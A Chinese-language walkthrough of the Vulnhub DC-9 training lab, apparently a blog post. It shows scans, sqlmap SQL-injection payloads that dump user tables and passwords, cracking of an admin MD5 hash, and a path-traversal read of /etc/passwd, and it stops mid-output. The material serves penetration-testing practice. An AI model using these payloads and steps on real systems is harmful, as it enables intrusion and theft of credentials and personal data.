vuInhub靶场实战系列-DC-9实战

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

免责声明
前言
一、环境配置
二、信息收集
- 2.1 主机发现
- 2.2 端口扫描
- 2.3 指纹识别
- 2.4 目录扫描
- - 2.4.1 Nikto目录扫描
  - 2.4.2 dirsearch目录扫描
- 2.5 漏洞发现
- 2.5.1 页面访问
三、渗透测试
- 3.1 SQL注入
- - 3.1.1 获得数据库名称列表
  - 3.1.2 获取数据库中的表名
  - 3.1.2.1 获取数据库Staff中的表名
  - 3.1.2.2 获取数据库users中的表名
  - 3.1.3 获取表中信息
  - - 3.1.3.1 获取StaffDetails（Staff数据库）表中信息
    - 3.1.3.2 获取Users（Staff数据库）表中信息
    - 3.1.3.1 获取UserDetails（users数据库）表中信息
- 3.2 LFI包含
- - 3.2.1 登录
  - 3.2.2 文件包含漏洞
  - 3.2.3 敲门服务
- 3.3 SSH相关
- - 3.3.1 nc开启SSH服务
  - 3.3.2 端口扫描
  - 3.3.3 hydra
  - - 3.3.3.1 生成字典
    - 3.3.3.2 执行hydra爆破ssh
- 3.4 ssh连接
- - 3.4.1 chandlerb
  - 3.4.2 joeyt
  - 3.4.3 janitor
  - 3.4.4 fredf
- 3.5 linux系统提权
- - 3.5.1 kali生成hash密码
  - 3.5.2 将密码写入/etc/passwd
  - 3.5.3 获得flag
  - - 3.5.3.1 切换admin用户
    - 3.5.3.2 查找flag文件
    - 3.5.3.3 查看flag文件
渗透总结
参考文章

前言

今日测试内容渗透dc-9靶机：

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞。本文将介绍dc-9靶机渗透测试，内容包括nmap扫描、目录扫描(nikto\dirsearch\dirb)、SQ注入、wfuzz爆破、LFI文件包含、SSH爆破(knockd\nmap\netcat\Hydra)、linux内核提权(openssl)并获得flag等内容。

Description
Back to the Top
DESCRIPTION
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again.
But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

一、环境配置

靶场信息

官方链接	https://www.vulnhub.com/entry/dc-9,412/
发布日期	2019年12月29日
靶场大小	700MB
作者	DCAU
系列	DC
难度	★★☆☆☆

渗透测试环境配置，请参考作者前面的内容，不再赘述：

vuInhub靶场实战系列-DC-2实战：https://editor.csdn.net/md/?articleId=139026849

二、信息收集

2.1 主机发现

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.145	00:0c:29:c1:5e:37	VMware, Inc.
192.168.6.254	00:50:56:e9:88:8e	VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 4 responded

获得目标主机信息：
IP地址： 192.168.6.145
MAC地址： 00:0c:29:c1:5e:37

2.2 端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 06:35 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:C1:5E:37 (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

扫描结果显示：
22端口：ssh服务（filtered过滤）
80端口：http服务

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.145
WhatWeb report for http://192.168.6.145
Status    : 200 OK
Title     : Example.com - Staff Details - Welcome
IP        : 192.168.6.145
Country   : RESERVED, ZZSummary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 2.4.38 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Debian LinuxString       : Apache/2.4.38 (Debian) (from server string)HTTP Headers:HTTP/1.1 200 OKDate: Sat, 01 Jun 2024 10:39:45 GMTServer: Apache/2.4.38 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 402Connection: closeContent-Type: text/html; charset=UTF-8

结果显示：
Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

2.4 目录扫描

2.4.1 Nikto目录扫描

┌──(root㉿kali)-[/home/kali]
└─# nikto -host 192.168.6.145
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.6.145
+ Target Hostname:    192.168.6.145
+ Target Port:        80
+ Start Time:         2024-06-01 06:41:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-06-01 06:42:21 (GMT-4) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2.4.2 dirsearch目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.145 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.6.145/_24-06-01_06-43-35.txtTarget: http://192.168.6.145/[06:43:35] Starting: 
[06:43:40] 403 -  278B  - /.ht_wsr.txt                                      
[06:43:40] 403 -  278B  - /.htaccess.sample
[06:43:40] 403 -  278B  - /.htaccess.bak1
[06:43:40] 403 -  278B  - /.htaccess.save                                   
[06:43:40] 403 -  278B  - /.htaccess_orig
[06:43:40] 403 -  278B  - /.htaccess_sc
[06:43:40] 403 -  278B  - /.htaccess.orig
[06:43:40] 403 -  278B  - /.htaccessBAK
[06:43:40] 403 -  278B  - /.html                                            
[06:43:40] 403 -  278B  - /.htm                                             
[06:43:40] 403 -  278B  - /.htaccessOLD2                                    
[06:43:40] 403 -  278B  - /.htpasswd_test                                   
[06:43:40] 403 -  278B  - /.htaccessOLD                                     
[06:43:40] 403 -  278B  - /.htaccess_extra                                  
[06:43:40] 403 -  278B  - /.htpasswds                                       
[06:43:40] 403 -  278B  - /.httr-oauth                                      
[06:43:42] 403 -  278B  - /.php                                             
[06:44:07] 200 -    0B  - /config.php                                       
[06:44:10] 301 -  312B  - /css  ->  http://192.168.6.145/css/               
[06:44:23] 200 -  407B  - /includes/                                        
[06:44:23] 301 -  317B  - /includes  ->  http://192.168.6.145/includes/     
[06:44:32] 200 -  494B  - /manage.php                                       
[06:44:54] 403 -  278B  - /server-status/                                   
[06:44:53] 403 -  278B  - /server-status                                    Task Completed

测试结束，获得一些关键信息：
http://192.168.6.145/includes/
http://192.168.6.145/manage.php

2.5 漏洞发现

2.5.1 页面访问

管理页面： http://192.168.6.145/manage.php

网站根目录：192.168.6.145

Home页：http://192.168.6.145/index.php

display页：http://192.168.6.145/display.php

search页：http://192.168.6.145/search.php

分析：
在search页输入’or 1=1 --+,点击submit
返回信息如下：

返回17条用户信息，所有此页面（http://192.168.6.145/search.php）存在SQL注入漏洞

三、渗透测试

3.1 SQL注入

3.1.1 获得数据库名称列表

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" --dbs_____H_____ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:15:05 /2024-06-01/[07:15:06] [INFO] testing connection to the target URL
[07:15:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:15:06] [INFO] testing if the target URL content is stable
[07:15:06] [INFO] target URL content is stable
[07:15:06] [INFO] testing if POST parameter 'search' is dynamic
[07:15:07] [WARNING] POST parameter 'search' does not appear to be dynamic
[07:15:07] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[07:15:07] [INFO] testing for SQL injection on POST parameter 'search'
[07:15:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:15:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:15:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:15:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:15:07] [INFO] testing 'Generic inline queries'
[07:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:15:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:15:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:18:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:18:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:18:50] [INFO] target URL appears to be UNION injectable with 6 columns
[07:18:50] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:18:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:18:53] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users[07:18:53] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:18:53 /2024-06-01/

测试结束，获得数据库列表：
fetching database namesavailable databases [3]:
[ * ] information_schema
[ * ] Staff
[ * ] users

3.1.2 获取数据库中的表名

3.1.2.1 获取数据库Staff中的表名

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff --tables     _____H_____ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:31:48 /2024-06-01/[07:31:48] [INFO] resuming back-end DBMS 'mysql' 
[07:31:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:31:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:31:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+[07:31:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:31:48 /2024-06-01/

爆破Staff数据库获得2个表：
StaffDetails
Users

3.1.2.2 获取数据库users中的表名

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users --tables_____H_____ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:34:48 /2024-06-01/[07:34:48] [INFO] resuming back-end DBMS 'mysql' 
[07:34:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:34:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:34:48] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+[07:34:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:34:48 /2024-06-01/

爆破users数据获得1个表：
UserDetails

3.1.3 获取表中信息

3.1.3.1 获取StaffDetails（Staff数据库）表中信息

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T StaffDetails --dump_____H_____ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:38:15 /2024-06-01/[07:38:16] [INFO] resuming back-end DBMS 'mysql' 
[07:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:38:16] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[07:38:16] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+[07:38:17] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/StaffDetails.csv'
[07:38:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:38:17 /2024-06-01/

爆破信息如上图bash代码块所示,展示了所有数据库Staff中的StaffDetails表对应的所有用户信息（email,phone,lastname,firstname,position）。

3.1.3.2 获取Users（Staff数据库）表中信息

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T Users --dump       _____H_____ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:45:38 /2024-06-01/[07:45:38] [INFO] resuming back-end DBMS 'mysql' 
[07:45:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:45:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:45:38] [INFO] fetching columns for table 'Users' in database 'Staff'
[07:45:38] [INFO] fetching entries for table 'Users' in database 'Staff'
[07:45:39] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[07:45:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapamxv6dki591911/sqlmaphashes-btocsf9y.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[07:45:44] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [07:45:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [07:45:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:45:47] [INFO] starting 8 processes 
[07:46:13] [WARNING] no clear password(s) found                                                                                                                                                                                   
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+[07:46:13] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/Users.csv'
[07:46:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:46:13 /2024-06-01/

爆破信息如上图bash代码块所示,展示了所有数据库Staff中的Users表对应的用户信息（只有一条数据）:

用户名（Username ）	密码（Password）
admin	856f5de590ef37314e7c3bdf6f8a66dc(transorbital1)

Password的长度为32,应该是MD5加密。
使用在线解密网站，进行解密，得到Password的明文密码：
Password:transorbital1

3.1.3.1 获取UserDetails（users数据库）表中信息

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users -T UserDetails --dump_____H_____ ___[(]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 08:00:17 /2024-06-01/[08:00:18] [INFO] resuming back-end DBMS 'mysql' 
[08:00:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[08:00:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:00:18] [INFO] fetching columns for table 'UserDetails' in database 'users'
[08:00:18] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+[08:00:18] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/users/UserDetails.csv'
[08:00:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 08:00:18 /2024-06-01/

爆破得到users数据库中UserDetails表中所有用户信息，包含用户名（username ）和密码（password）

3.2 LFI包含

3.2.1 登录

登录页：http://192.168.6.145/manage.php
用户名：admin
密码：transorbital1

3.2.2 文件包含漏洞

测试连接：http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/passwd
返回数据：

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty 